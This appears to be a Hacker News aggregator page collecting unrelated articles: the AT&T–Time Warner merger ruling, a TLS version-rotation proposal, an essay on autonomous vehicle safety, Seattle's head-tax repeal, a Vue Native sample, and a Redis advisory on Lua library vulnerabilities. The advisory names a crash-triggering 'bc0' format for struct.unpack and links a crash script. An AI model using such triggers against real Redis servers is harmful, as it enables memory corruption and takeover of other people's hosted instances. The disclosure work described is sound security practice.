Quantcast
Channel: Hacker News
Viewing all 25817 articles
Browse latest View live

AT&T Cleared by Judge to Buy Time Warner

$
0
0

WASHINGTON — AT&T’s $85.4 billion proposed merger with Time Warner can proceed and does not pose antitrust problems, a federal judge ruled on Tuesday.

U.S. District Judge Richard Leon announced his decision at a hearing at the federal courthouse, gathering all of the parties together for a dramatic coda after a six-week trial.

The decision was definitive, as Leon read from his opinion in the courtroom and concluded that the government had failed to prove that the merger would substantially lessen competition. Time Warner lead attorney Daniel Petrocelli told reporters outside the courthouse that the merger was on track to close June 20.

“We are pleased that, after conducting a full and fair trial on the merits, the Court has categorically rejected the government’s lawsuit to block our merger with Time Warner,” AT&T general counsel David McAtee said in a statement.

The Justice Department has not announced whether it will appeal the case. After he read from his opinion, Leon also strongly suggested that the government not seek a stay pending an appeal.

He said it would be a “manifestly injustice” outcome of the case if the government sought a stay to further delay the merger, costing both companies, which have a $500 million breakup fee and faced a self-imposed June 21 deadline to complete the transaction.

“To use a stay to accomplish indirectly what could not be done directly — especially when it would cause certain irreparable harm to the defendants — simply would be unjust,” Leon said. “I hope and trust that the government will have the good judgment, wisdom and courage to avoid such a manifest injustice.”

Leon also seemed to be urging the government to think twice about even pursuing an appeal. He noted the “staggering cost” of the investigation, litigation and trial, saying that it has “easily” run into tens of millions of dollars for the companies and the government.

Makan Delrahim, the chief of the Antitrust Division, told reporters afterward that he was “disappointed. We obviously don’t agree.” He said they are still reviewing the opinion, which is 170 pages.

The Justice Department’s Antitrust Division challenged the vertical merger by arguing that it would ultimately cost consumers. The crux of the DOJ’s argument was that AT&T-Time Warner would use its increased leverage as a bulked up entity to extract higher carriage fees for channels like TBS, TNT, and CNN.

It also argued that the combined company could withhold the use of HBO as a promotional tool by AT&T’s rivals, and that the merger conglomerate would have the incentive to coordinate with another big media company, Comcast-NBC Universal, to try to limit the growth of new streaming upstarts.

Leon found those arguments unconvincing.

In his opinion, he seemed to side with AT&T’s defense that, far from withholding Time Warner content from rivals to gain an advantage, the merged company instead would have the incentive to seek maximum carriage of content across an array of platforms.

He also was receptive to AT&T’s case for sizing up the merger in the context of rapid changes in the media landscape, with the rise of Netflix, Google and Amazon as rivals for consumers and advertisers.

He wrote that he could not evaluate the case “without factoring in the dramatic changes that are transforming how consumers view video content.”

As he read his opinion in the courtroom, Delrahim and the DOJ’s legal team, led by Craig Conrath, listened intently and did not show any emotion.

Outside the courthouse, at a press conference, Petrocelli told reporters that Leon’s “sweeping rejection does not surprise us at all.”

“The government could present no credible proof in support of its theories,” Petrocelli said, adding that the case “shrunk and shrunk and shrunk until there was nothing there by the end of the day.”

The ruling has tremendous implications for future media mergers, as public interest groups and Wall Street analysts predict that it will clear the way for greater consolidation and combinations between content and distribution.

Comcast, for instance, is weighing a rival bid for many of the assets of 21st Century Fox, hoping to usurp The Walt Disney Co.’s agreement to purchase the media properties. Verizon is seen as likely on the hunt for a key content player, and there has long been speculation that a big tech company, like Google, Apple, or Facebook, would try to acquire a traditional Hollywood studio.

UBS’s John Hodulik wrote last week that a favorable ruling for AT&T could serve as a “green light” for other transactions. “This decision will likely serve as the litmus test for other potential M&A and has broad implications for stocks in the cable, telco, and media space,” he wrote in a research note.

Gene Kimmelman, president and CEO of the public interest group Public Knowledge, said earlier this month that the impact of an AT&T victory in the case will be “enormous.” “You are going to see an explosion of vertical mergers — three or four [companies] that gobble up the most valuable properties in the media ecosystem.”

He also predicted that the tech sector would accelerate its vertical integration, but he doesn’t think that will be via a media company. He described what he saw as a “territorial split,” in which the media sector protects its base through consolidation and tech companies see an opening “to entrench themselves in their current businesses and block out potential rivals.”

Kimmelman doubted that if AT&T won, the government could obtain a stay to stop the merger from going forward pending an appeal. He noted that the government would likely have to prove that there was a good chance they will succeed in their case and the merger moving forward would cause irreparable harm, Kimmelman said.

“That is a heavy lift. It may stretch things out somewhat, but I am not sure it will stop the transaction,” Kimmelman said.

Some public interest advocates urged the DOJ to appeal.

“This ruling will open the floodgates, at a minimum, to more vertical mergers of this kind. Comcast will bid for Fox’s assets,” said Gigi Sohn, a former FCC official and fellow at the Georgetown Law Institute for Technology Law & Policy. Other cable and broadband companies will look to merge with the remaining Hollywood studios and other programmers.  Even parties seeking horizontal mergers, like Sprint & T-Mobile, will try to use this decision to justify shrinking competitors in the same market.

What is unclear is what impact the ruling will have on the future willingness of the Justice Department to challenge vertical transactions. Delrahim told reporters that he would continue to insist that mergers that pose antitrust problems agree to structural solutions, in which properties are divested as conditions of approval. The DOJ did so in this case — insisting that AT&T-Time Warner shed either DirecTV or the Turner networks, but the companies said that doing so would kill the rationale for the deal.

Instead, they said that Turner networks would agree to go into “baseball-style” arbitration with AT&T’s distribution rivals in the event of carriage disputes. A Time Warner spokesman said that they will continue to honor that offer.

AT&T and Time Warner announced an agreement for a $85.4 billion merger on Oct. 22, 2016, but the deal quickly got swept up in the presidential race. Donald Trump said he would block the merger because it was “too much concentration of power in the hands of too few.”

After Trump was elected, many Wall Street analysts believed that the transaction would ultimately pass antitrust scrutiny with a new Republican administration in charge. Before Delrahim was nominated as the new antitrust chief, he said on Canadian TV that he didn’t see the merger as a “major antitrust problem.” Delrahim later noted that in that same interview, he also said that the transaction nevertheless would still raise concerns.

Less than two months after he was confirmed, Delrahim led the Antitrust Division in challenging the transaction in court. The division filed suit on Nov. 20, 2017, claiming that the merger would give AT&T-Time Warner increased leverage against rivals, driving up the prices competitors pay for the Turner networks. It also claimed that the combined company could withhold rivals’ ability to use HBO, the Time Warner-owned premium service, as a promotional tool to draw subscribers.

AT&T CEO Randall Stephenson fought back, and characterized Trump’s opposition to the transaction and his animosity toward CNN as the “elephant in the room.” In a pretrial hearing, AT&T-Time Warner’s legal team sought to pursue a line of defense that they were unfairly singled out by the DOJ and the White House for antitrust enforcement, given Trump’s attacks on CNN.

Petrocelli told reporters on Tuesday that he had “no insight” on Trump’s role, other than to note that Leon rejected their efforts to seek discovery of White House and Justice Department documents.

Gary Ginsberg, spokesman for Time Warner, was more direct. “The court’s resounding rejection of the government’s arguments is confirmation that this was a case that was baseless, political  in its motivation and should never have been brought in the first place,” he said.

The six-week trial — perhaps the most closely watched antitrust case in a generation — featured testimony from Stephenson, Time Warner CEO Jeff Bewkes, and a slew of other corporate executives from the company and from rivals. But much of it hinged on the Justice Department’s ability to prove that the merger would harm consumers.

The DOJ relied on a number of experts to show that pay TV customers would face higher bills — by their account $463 million per year. Chief among them was Carl Shapiro, economist at the University of California at Berkeley, who faced perhaps the most contentious cross-examination from AT&T-Time Warner’s legal team, led by Petrocelli.

Petrocelli attacked Shapiro’s methodology for concluding that the merger would result in a price increase of 45 cents per month per pay TV subscriber. AT&T’s legal team later produced their own witness, Dennis Carlton of the University of Chicago, who claimed that Shapiro’s model was “theoretically unsound.”

Leon, too, found fault in Shapiro’s analysis. At one point during the trial, Leon had called Shapiro’s model a “Rube Goldberg contraption,” and he reiterated that point in his opinion.

“But in fairness to Mr. Goldberg, at least his contraptions would normally move a pea from one side of the room to another,” he wrote in his ruling. “By contrast, the evidence at trial showed that Professor Shapiro’s model lacks both ‘reliability and factual credibility,’ and thus fails to generate probative predictions of future harm” that the government was making.

He wrote that he was left with no “adequate basis to conclude that the challenged merger will lead to any raised costs on the part of distributors and consumers — much less consumer harms that outweigh the conceded $350 million in annual cost savings to AT&T’s customers.”

Read the judge’s ruling:


Enforcing TLS protocol invariants by rolling versions every six weeks

$
0
0

Hi all,

Now that TLS 1.3 is about done, perhaps it is time to reflect on the ossification problems.

TLS is an extensible protocol. TLS 1.3 is backwards-compatible and may be incrementally rolled out in an existing compliant TLS 1.2 deployment. Yet we had problems. Widespread non-compliant servers broke on the TLS 1.3 ClientHello, so versioning moved to supported_versions. Widespread non-compliant middleboxes attempted to parse someone else’s ServerHellos, so the protocol was further hacked to weave through their many defects.

I think I can speak for the working group that we do not want to repeat this adventure again. In general, I think the response to ossification is two-fold:

1. It’s already happened, so how do we progress today?

2. How do we avoid more of this tomorrow?

The workarounds only answer the first question. For the second, TLS 1.3 has a section which spells out a few protocol invariants. It is all corollaries of existing TLS specification text, but hopefully documenting it explicitly will help. But experience has shown specification text is only necessary, not sufficient.
For extensibility problems in servers, we have GREASE. This enforces the key rule in ClientHello processing: ignore unrecognized parameters. GREASE enforces this by filling the ecosystem with them. TLS 1.3’s middlebox woes were different. The key rule is: if you did not produce a ClientHello, you cannot assume that you can parse the response. Analogously, we should fill the ecosystem with such responses. We have an idea, but it is more involved than GREASE, so we are very interested in the TLS community’s feedback.

In short, we plan to regularly mint new TLS versions (and likely other sensitive parameters such as extensions), roughly every six weeks matching Chrome’s release cycle. Chrome, Google servers, and any other deployment that wishes to participate, would support two (or more) versions of TLS 1.3: the standard stable 0x0304, and a rolling alternate version. Every six weeks, we would randomly pick a new code point. These versions will otherwise be identical to TLS 1.3, save maybe minor details to separate keys and exercise allowed syntax changes. The goal is to pave the way for future versions of TLS by simulating them (“draft negative one”).

Of course, this scheme has some risk. It grabs code points everywhere. Code points are plentiful, but we do sometimes have collisions (e.g. 26 and 40). The entire point is to serve and maintain TLS’s extensibility, so we certainly do not wish to hamper it! Thus we have some safeguards in mind:

* We will document every code point we use and what it refers to. (If the volume is fine, we can email them to the list each time.) New allocations can always avoid the lost numbers. At a rate of one every 6 weeks, it will take over 7,000 years to exhaust everything.

* We will avoid picking numbers that the IETF is likely to allocate, to reduce the chance of collision. Rolling versions will not start with 0x03, rolling cipher suites or extensions will not be contiguous with existing blocks, etc.

* BoringSSL will not enable this by default. We will only enable it where we can shut it back off. On our servers, we of course regularly deploy changes. Chrome is also regularly updated and, moreover, we will gate it on our server-controlled field trials mechanism. We hope that, in practice, only the last several code points will be in use at a time.

* Our clients would only support the most recent set of rolling parameters, and our servers the last handful. As each value will be short-lived, the ecosystem is unlikely to rely on them as de facto standards. Conversely, like other extensions, implementations without them will still interoperate fine. We would never offer a rolling parameter without the corresponding stable one.

* If this ultimately does not work, we can stop at any time and only have wasted a small portion of code points.

* Finally, if the working group is open to it, these values could be summarized in regular documents to reserve them, so that they are ultimately reflected in the registries. A new document every six weeks is probably impractical, but we can batch them up.

We are interested in the community’s feedback on this proposal—anyone who might participate, better safeguards, or thoughts on the mechanism as a whole. We hope it will help the working group evolve its protocols more smoothly in the future.

The Menace and the Promise of Autonomous Vehicles

$
0
0

Jacob Silverman | Longreads | June 2018 | 10 minutes (2,419 words)

In Tempe, Arizona, on the cool late-winter night of March 18, Elaine Herzberg, a 49-year-old homeless woman, stepped out onto Mill Avenue. A new moon hung in the sky, providing little illumination. Mill Avenue is a multi-lane road, and Herzberg was walking a bike across; plastic bags with some of her few possessions were dangling from the handlebars. Out of the darkness, an Uber-owned Volvo XC90 SUV, traveling northbound, approached at 39 miles per hour, and struck Herzberg. The Uber came to an unceremonious stop, an ambulance was called, and she died later in a hospital. The car had been in autonomous mode.

At least two Tesla drivers have died while behind the wheel of a car on autopilot, but Herzberg was the first pedestrian fatality of an autonomous vehicle, or AV. Her death is more than a grim historical fact. It is an unfortunate milestone in one of technology’s great utopian projects: the deployment of AVs throughout society. As an economic effort, it may be revolutionary—driver is one of the most common professions in the United States, and some of the most significant AV initiatives center on making taxis and freight trucks self-driving. As a safety measure, AVs promise to eliminate some 35,000 deaths each year, which are blamed on driver error. While computers are, of course, prone to make mistakes—and vulnerable to hacking—the driverless future, we are told, will feature far less danger than the auto landscape to which we’ve been accustomed. To get there, though, more people are going to die. “The reality is there will be mistakes along the way,” James Lentz, the CEO of Toyota North America, said at a public event after Herzberg was killed. “A hundred or 500 or a thousand people could lose their lives in accidents like we’ve seen in Arizona.” That week, the company announced that it would pause AV testing on public roads. Recently, when I asked if Toyota has calculated how many casualties it expects to cause in pursuit of AVs, a spokesperson replied that the company is focused on reducing the number of fatalities at the hands of human drivers: “Our goal in developing advanced automated technologies is to someday create a vehicle incapable of causing a crash.”

Implied in these remarks is the notion that deaths like Herzberg’s are the price of progress. Following the accident, Uber temporarily halted public AV testing, though it plans to resume in the coming months, just not in Arizona. (Volvo has kept mum, while several companies that contribute self-driving technology to Uber’s vehicles—Nvidia, Mobileye, Velodyne—have claimed that their features were deployed improperly, placing blame on Uber.) An Uber spokesperson told me that the company is cooperating with an investigation by the National Transportation Safety Board and examining its testing process: “We have initiated a top-to-bottom safety review of our self-driving vehicles program, and we have brought on former NTSB Chair Christopher Hart to advise us on our overall safety culture.” But what does it mean to experiment with technologies that we know will kill people, even if the promised results would save lives?

***

Autonomous vehicles are seeing machines. With sensors, cameras, and radars harvesting petabytes of data, they try to read and make sense of their surroundings—to perceive lanes, trees, traffic lights. According to a preliminary NTSB report, the car that hit Herzberg initially registered her “as an unknown object, as a vehicle, and then as a bicycle.” With 1.3 seconds until impact, the car’s system decided to make “an emergency braking maneuver,” but Uber had disabled the Volvo’s emergency braking mechanism, hoping to avoid a herky-jerky ride. “The vehicle operator is relied on to intervene and take action,” the report notes, but “the system is not designed to alert the operator.” In the Volvo that night, there was a human backup driver behind the wheel, but she was looking down at a screen, relaying data, so she didn’t see Herzberg in time to take over.

Like the algorithms that power Google Search or Facebook’s newsfeed, AV decision-making mostly remains the stuff of proprietary trade secrets. But the NTSB investigation and other reportage help sketch a picture of why Uber’s systems failed that night in Tempe: After the accident, Reuters reported that Uber had decreased the number of LIDAR (laser-based radar) modules on its vehicles and removed a safety driver (previously, there had been two—one to sit behind the wheel and another to monitor data). These details aren’t necessarily inculpatory, but they seem to suggest an innovate-at-all-costs operation that puts little emphasis on safety.

To conduct testing, the AV industry has quietly—even covertly—spread from private tracks to public roads across the country. A patchwork of municipal, state, and federal regulations means that, while important research is underway in dozens of states, it can be difficult to glean where cars are going and what safety standards are in place. Aiming to lure innovators, Arizona, Texas, and Michigan have competed to provide the lightest regulatory touch. In 2016, after California established a comparatively robust set of AV regulations, Doug Ducey, the governor of Arizona, told Uber, “California may not want you, but we do.” Google’s Waymo and General Motors arrived, too. Ducey encouraged the start of an AV pilot program before the public was informed—Herzberg was probably unaware that these companies were testing in her community when she was hit—and weeks before the crash he issued an executive order explicitly allowing driverless vehicles on city streets. The order set rules making companies liable for criminally negligent fatalities, yet Sylvia Moir, Tempe’s police chief, said that the company would likely not be at fault in the accident; Ducey quickly banned Uber from testing AVs in his state, but hundreds of other self-driving cars are still on the road.

On the federal level, there has not been much scrutiny of how AVs operate. The AV Start Act, a bill that would encourage AV testing with minimal federal oversight, has been held up by Democratic senators who worry it doesn’t do enough to address safety concerns. The NTSB has established a scale to measure autonomous functions, ranging from 0 to 5 (with 5 being a car so self-directed that it doesn’t have a steering wheel). But most policy decisions have fallen to state legislatures and industry-friendly governors. Unlike pharmaceutical research, which has stringent standards, Silicon Valley’s products are commonly seen as inherently beneficial, and AV companies seem to have carte blanche to test their inventions.

If autonomous vehicles are a technological inevitability, how do we know when they’ve arrived?

This regulatory free-for-all has led to a host of questions from concerned citizens and transportation advocates. Matters of liability have not been standardized, which leaves open who should be responsible when an AV crashes—the owner, the manufacturer, the insurer? (Uber has already settled with some of Herzberg’s relatives.) What of the companies whose hardware and software are combined in an AV’s complicated systems? How does a robo-taxi ensure customer compliance, and how might it deal with someone who doesn’t pay or refuses to get out of a car? Should police have the ability to take control of AVs, forcing them to pull over? More broadly, if autonomous vehicles are a technological inevitability, how do we know when they’ve arrived?

Without clear rules—or sufficient data—it may be up to the market to decide on AV standards. Manufacturers like Mercedes are testing levels of autonomy, offering more computer-assisted cruise control and parking features, for instance, without asking drivers to surrender their full attention. In models reliant on a computer’s discretion, however, customers may soon be able to choose between a utilitarian vehicle that will maximize good for all, or a “self-protective” one that will preserve the passengers’ safety at all costs. Which can you afford? Someone’s life may depend on the answer.

***

That Uber’s AV didn’t see Herzberg, a homeless woman, as a human being makes a kind of perverse sense, since AVs—especially robo-taxis—weren’t made for people like her. Neither were the sprawling cities like Tempe where these cars are being tested. Besides their inviting regulatory environments, these areas were chosen because of their open road systems, good weather, and few cyclists and pedestrians. At a time when urbanists are preaching multi-modal mobility, from bikes to buses, AVs are a kind of throwback, making streets less accommodating to anyone on foot; by increasing the number of cars—particularly passenger-free delivery vehicles—they tend to worsen traffic and pollution. And even if the auto industry could develop an impossibly perfect algorithm for safety, widespread AV adoption would require massive road infrastructure upgrades to fix lane lines and embed communication beacons; faulty GPS systems, outdated maps, surveillance and privacy challenges, cybersecurity flaws, bandwidth limits, and expensive hardware would all be vexing.

Despite all this, Thomas Bamonte, who works as a senior program manager for AVs at the North Central Texas council of governments, is optimistic. When we spoke, he told me about Drive.ai, a company that recently announced it would launch a pilot fleet of AVs in the city of Frisco. Drive.ai’s service doesn’t much resemble an Uber robo-taxi, he explained: The vehicles are Nissan vans, limited to roaming around a small commercial district during daylight hours; to make them stand out, they have been painted bright orange with a wavy blue stripe bearing the words “Self-Driving Vehicle.” The vans are also equipped with screens that signal when passengers are boarding and when it’s safe to walk past. And they will, at least at first, feature human safety drivers.

The Drive.ai program lacks the ambition of, say, Waymo’s Phoenix-area AV service, which ferries passengers around without a human driver ready to take the wheel, but the project—publicly announced, small in scope, conducted in partnership with city officials—seems to take a more measured approach to AV testing than exists elsewhere. Bamonte described Frisco’s AV program as “kind of crawl, walk, run.”

“We don’t want developers to just plop down unannounced and start doing a service,” Bamonte told me. He compared the Drive.ai testing favorably to Tesla’s, whose roadster has ambitious autopilot features that have already been deployed in thousands of commercial vehicles, wherever drivers take them. So far, Tesla’s autopilot mode has caused several high-profile crashes on public roads, including fatal accidents in Florida and California. The Uber crash has “added note of caution,” Bamonte said, but “it’s our responsibility to continue to explore and test this technology in a responsible way.” For him, that means closed tracks and computer simulations; after conducting a public education campaign and soliciting feedback, deployment on public streets will inevitably follow. To learn if these cars can work for us, we have to put them in real-world conditions, he explained. “You just can’t do that in a laboratory.”

***

Central to AV testing is the “trolley question,” based on a scenario in which a runaway trolley threatens to fatally run over a crowd—unless someone can pull a lever, redirecting the trolley onto another track, where a single person is standing. No matter what happens, this thought experiment proffers, someone is going to die. It’s up to us to choose. With AV testing, that decision ostensibly lies within software. At stake is whether cars can be adequately programmed to select the lesser of two evils: swerving to avoid a crowd of pedestrians if it means killing one pedestrian or the vehicle’s passenger. In a 2016 paper, “The Social Dilemma of Autonomous Vehicles,” three scientists examined public trust in that decision making-process. In a survey of about 2,000 people, most respondents liked the idea of an AV sacrificing itself to save others; but as passengers, they said they would want the car to preserve their own safety no matter what. “To align moral algorithms with human values,” the researchers advised, “we must start a collective discussion about the ethics of AVs—that is, the moral algorithms that we are willing to accept as citizens and to be subjected to as car owners.”

The study’s authors worried that mandating utilitarian AVs—those that would swerve to avoid a crowd—through federal regulation would present a confounding problem: passengers would never agree to be rationally self-sacrificing. “Regulation could substantially delay the adoption of AVs,” they wrote, “which means that the lives saved by making millions of AVs utilitarian may be outnumbered by the deaths caused by delaying.” Things get even more complicated in what are called edge cases, in which an AV may face a variety of thorny weather, traffic, and other conditions at once, forcing a series of complex rapid-fire decisions. The report concludes, “There seems to be no easy way to design algorithms that would reconcile moral values and personal self-interest.”

Programming morality into our vehicles is a matter of deeper, almost mystical complexity.

Azim Shariff—one of the paper’s authors and a professor at the University of California, Irvine—has called for “a new social contract” for AVs. Riding in one will mean giving yourself over to a machine whose “mind” humans don’t understand—and which, in a moment of crisis, may be programmed to prioritize the lives of others over your own. “I’ve kind of wracked my brain to think of another consumer product which would purposefully put their owners at risk against their wishes,” he told me. “It’s really a radically new situation.”

In practice, Shariff went on, cars are unlikely to be faced by stark choices. The trolley question is meant to emblematize tough decision-making for the purpose of moral deliberation; programming morality into our vehicles is a matter of deeper, almost mystical complexity. “The cars are going to have to be choosing in the maneuvers that they make to slightly increase the risk toward a pedestrian rather than the passenger, or slightly increase the risk toward somebody who’s walking illegally versus someone who’s walking legally,” he said. That’s a fraction of a percent here or there. “Only at the aggregate level, with all the cars driving all the miles, will you then see the statistical version of these scenarios emerge.”

It will take billions of miles—and some unknown number of people killed—to gauge whether, by a statistically significant margin, AVs are safer than human-driven cars. For now, there is mostly speculation and experimentation. The death of Elaine Herzberg is “a new data point,” according to Jensen Huang, the CEO of Nvidia, which makes chips for self-driving systems. “We don’t know that we would do anything different, but we should give ourselves time to see if we can learn from that incident,” he said. “It won’t take long.”

***

Jacob Silverman is the author of Terms of Service: Social Media and the Price of Constant Connection.

***

Editor: Betsy Morais
Fact-checker: Ethan Chiel

Seattle officials repeal tax on large companies

$
0
0

Seattle officials scuttled a corporate tax on Tuesday that they had wholeheartedly endorsed just a month ago, delivering a win for the measure’s biggest opponent — Amazon — and offering a warning to cities bidding for the retailer’s second headquarters that the company would go to the limit to get its way.

The tax would have raised about $50 million a year to help the homeless and fund affordable housing projects. As Seattle has boomed over the last decade, in large part because of Amazon, which is based there, rents have soared and some residents have suffered. The city’s homeless population is the third largest in the country, after New York and Los Angeles.

Taxing successful companies to help alleviate some of the problems that their success caused was such a compelling idea that it was quickly taken up in Silicon Valley itself. California cities like Cupertino, East Palo Alto, Mountain View and San Francisco have recently explored various forms of a head tax, under which large employers in each town would be charged a fee per employee.

But in Seattle, the notion has proved extraordinarily contentious, culminating in the abrupt reversal on Tuesday.

The Seattle City Council repealed the tax in a 7-to-2 vote that was accompanied by large doses of acrimony and despair. The crowd was standing room only, with some carrying posters that said “Tax Amazon Not Working People” while others supported repeal. The comment period was extended by the council members in a fruitless attempt to try to accommodate everyone. At least one Amazon employee spoke in favor of the tax, saying, “I want all kinds of people in this city, not just rich people.”

Less than a month ago, the tax had passed unanimously. It was signed into law on May 16 by Jenny A. Durkan, Seattle’s mayor, who said the money would “move people off the street and into safer places” and “clean up the garbage and needles that are in our parks and in our communities,” as well as provide resources including job training and health services.

“I know we can be a city that continues to invent the future and come together to build a more affordable, inclusive and just future,” she said.

Within days, that vision was in tatters. Amazon, which had already succeeded in watering down the original tax after halting expansion plans in protest, joined other Seattle-based corporate interests such as Starbucks, the Microsoft co-founder Paul Allen’s investment firm Vulcan and local food and grocery firms. All showed they would fight the law, and at least some residents took their side.

The opponents funded No Tax on Jobs, an effort aimed at getting enough signatures to put a repeal on the November ballot. It became obvious over the weekend that the measure would succeed in coming before voters, leading Ms. Durkan and seven council members to issue a statement saying, “We heard you.”

The politicians had no stomach for a protracted battle over jobs, even at a moment when the area’s unemployment rate is only 3.1 percent. “It is clear that the ordinance will lead to a prolonged, expensive political fight over the next five months that will do nothing to tackle our urgent housing and homelessness crisis,” they said.

An Amazon spokesman called the vote “the right decision.” A Starbucks spokesman said, “We welcome this move.”

Mike O’Brien, a council member, said in an interview before the vote, “I have a couple of bad choices and I’m picking the less bad,” meaning a vote to repeal.

He was puzzled by the intensity and the virulence of the opposition. “This tax is not a perfect tool, but I think it’s a good one,” he said. “When I’m out there talking to the community, I hear they’ve been convinced by Amazon and other business leaders that this would be bad.”

Teresa Mosqueda, one of the two council members opposing the repeal, said there was no backup plan for dealing with the homeless situation.

“We don’t have a path forward,” she said. “I share the frustration with all the City Council that we have been out-messaged.”

Kshama Sawant, the other opponent of repeal on the council, called the vote “both capitulation and betrayal.”

“They are choosing to base themselves on making Amazon executives happy,” she said. That “is the biggest lesson that should reverberate to other cities as well.”

The city’s initial plan was for the tax to collect about $500 per employee a year. Amazon responded in early May by stopping its expansion in the city “pending the outcome of the head tax vote.” That was sufficient to get the tax knocked down to about $275 per employee and scaled back in other ways. The tax was limited to companies with at least $20 million in revenue a year.

As the largest private employer in the city, with more than 45,000 local workers, Amazon would have had to pay initially about $12 million a year — a relative pittance for a company with revenue last year of $178 billion and whose chief executive, Jeff Bezos, the richest man in the world, said recently that the only thing he could think of to spend his fortune on was space travel.

Amazon officials have said the company is not against helping the homeless. But it thinks Seattle would just waste the money it raised. The city, the company believes, “has a spending efficiency problem.”

The retailer selected 20 finalists in January as possible sites for its new second headquarters, a process that has generated an enormous amount of attention and interest, even by Amazon’s standards. It has indicated that the community that won the right to as many as 50,000 new jobs would have to be an accommodating partner. Some of the finalists have offered extraordinary tax breaks.

In recent months, however, there has been the beginning of a resistance to the notion that what is good for Amazon is inevitably good for its host.

“From coast to coast, people lose their homes and get displaced from their communities even as the biggest corporations earn record profits and development booms,” said Sarah Johnson, director of Local Progress, a national association of progressive elected municipal officials. “Elected officials across the country are paying close attention to how Amazon and other corporations have responded to Seattle’s efforts to confront their affordable housing and homelessness crisis.”

Especially, it seems, in Silicon Valley itself, where both problems run deep.

Last week, the Mountain View City Council voted unanimously to proceed with plans to put a head-count tax on the ballot in November. Mountain View is home to Google, among other tech companies. The tax would raise about $6 million, half of it from Google, and be used for transit projects.

“We have needs we need to meet,” said Lenny Siegel, the city’s mayor. “And we look to see where there’s the most money. Most of our companies have money. We’re trying to find a way for them to invest it that helps them and the community.”

A version of this article appears in print on , on Page B1 of the New York edition with the headline: Amazon Played Hardball on New Tax. Now Seattle Is Killing the Tax.. Order Reprints | Today’s Paper | Subscribe

Vue Native

$
0
0

Quick hello world Example

<template>
<viewclass="container">
<textclass="text-color-primary">{{message}}</text>
</view>
</template>
<script>
exportdefault {
data: function() {
return {
message: "Hello World"
};
}
};
</script>
<style>
.container {
flex: 1;
background-color: white;
align-items: center;
justify-content: center;
}
.text-color-primary {
color: blue;
font-size: 30;
}
</style>

Atrium W18 (Democratizing Legal Services) Is Hiring a Sr. Software Eng – BackEnd

$
0
0

Atrium is a data-driven law firm designed to make access to corporate legal services transparent and price-predictable for everyone. We're doing this by building the first structured data platform for organizational data. We use modern techniques for extracting data that is locked away in legal documents, modeling how best to store this information, and inventing new ways for lawyers and paralegals to interact with the resulting structured data to help advise clients.

Atrium LTS ("Legal Technology Services") technology provides a better experience for legal clients than they previously thought possible, increasing communication and speed of service.

As a Senior Software Engineer - Back End, you will have a unique opportunity to be a technical lead on a team working to build a data platform that serves as the foundation for a suite of innovative legal tools and services used by lawyers, companies, and internal teams consisting of full stack and machine learning engineers. Your work will be the bridge between the product and machine learning teams, providing the skeleton of our data platform. We are using cutting-edge technology to classify, extract text from, and intelligently summarize exclusive legal documents and emails. We are a fast-growing company with leadership opportunities available to you as the team continues to expand.

Mininet on OpenBSD: Interactive SDN Testing and Development [pdf]

Redis Lua scripting: several security vulnerabilities fixed

$
0
0
antirez 1 hour ago. 3354 views.
A bit more than one month ago I received an email from the Apple Information Security team. During an auditing the Apple team found a security issue in the Redis Lua subsystem, specifically in the cmsgpack library. The library is not part of Lua itself, it is an implementation of MessagePack I wrote myself. In the course of merging a pull request improving the feature set, a security issue was added. Later the same team found a new issue in the Lua struct library, again such library was not part of Lua itself, at least in the release of Lua we use: we just embedded the source code inside our Lua implementation in order to provide some functionality to the Lua interpreter that is available to Redis users. Then I found another issue in the same struct package, and later the Alibaba team found many other issues in cmsgpack and other code paths using the Lua API. In a short amount of time I was sitting on a pile of Lua related vulnerabilities.

Those vulnerabilities are mostly relevant in the specific case of providing managed Redis severs on the cloud, because it is very unlikely that the vulnerabilities discovered can be used without direct access to the Redis server: many Redis users don’t use the cmsgpack or the struct package at all, and who does will very unlikely feed them with untrusted input. However for cloud providers things are different: they have Redis instances, sometimes in multi tenancy setups, exposed to the user that subscribed for the service. She or he can send anything to such Redis instances, triggering the vulnerabilities, corrupting the memory, violating the Redis process, and potentially taking total control of the Redis process.

For instance this simple Python program can crash Redis using one of the cmsgpack vunlerabilities [1].

[1] https://gist.github.com/antirez/82445fcbea6d9b19f97014cc6cc79f8a

However from the point of view of normal Redis users that control what is sent to their instances, the risk is limited to feeding untrusted data to a function like struct.unpack(), after selecting a particularly dangerous decoding format “bc0” in the format argument.

# Coordinating the advisory

Thanks to the cooperation and friendly communications between the Apple Information Security team, me, and the Redis cloud providers, I tried to coordinate the release of the vulnerability after contacting all the major Redis providers out there, so that they could patch their systems before the bug was published. I provided a single patch, so that the providers could easily apply it to their systems. Finally between yesterday and today I prepared new patch releases of Redis 3, 4 and 5, with the security fixes included. They are all already released if you are reading this blog post. Unfortunately I was not able to contact smaller or newer cloud providers. The effort to handle the communication with Redis Labs, Amazon, Alibaba, Microsoft, Google, Heroku, Open Redis and Redis Green was already massive, and the risk of leaks extending the information sharing with other subjects even higher (every company included many persons handling the process). I’m sorry if you are a Redis provider finding about this vulnerability just today, I tried to do my best.

I want to say thank you to the Apple Information Security team and all the other providers for the hints and help about this issue.

# The problem with Lua

Honestly when the Redis Lua engine was designed, it was not conceived with this security model of the customer VS the cloud provider in mind. The assumption kinda was that you can trust who pokes with your Redis server. So in general the Lua libraries were not scrutinized for security. The feeling back then was, if you have access to Redis API, anyway you can do far worse.

However later things evolved, and cloud providers restricted the API of Redis to expose to their customers, so that it was possible to provide managed Redis instances. However while things like the CONFIG or DEBUG commands were denied, you can’t really avoid exposing EVAL and EVALSHA. The Redis Lua scripting is one of the top used features in our community.

So gradually, without me really noticing, the Lua libraries became also an attack vector in a security model that should instead be handled by Redis, because of the changing system in the way Redis is exposed and provided to the final user. As I said, in this model more than the Redis user, is the managed Redis “cloud” provider to be affected, but regardless it is a problem that must be handled.

What we can do in order to improve the current state of cloud providers security, regarding the specific problem with Lua scripting? I identified a few things that I want to do in the next months.

1. Lua stack protection. It looks like Lua can be compiled, with some speed penalty, in a way that ensures that it is not possible to misuse the Lua stack API. To be fair, I think that the assumptions Lua makes about the stack are a bit too trivial, with the Lua library developer having to constantly check if there is enough space on the stack to push a new value. Other languages at the same level of abstraction have C APIs that don’t have this problem. So I’ll try to understand if the slowdown of applying more safeguards in the Lua low level C API is acceptable, and in that case, implement it.

2. Security auditing and fuzz testing. Even if my time was limited I already performed some fuzz testing in the Lua struct library. I’ll continue with an activity that will check for other bugs in this area. I’m sure there are much more issues, and the fact that we found just a given set of bugs is only due to the fact that there was no more time to investigate the scripting subsystem. So this is an important activity that is going to be performed. Again at the end of the activity, I’ll coordinate with the Redis vendors so that they could patch in time.

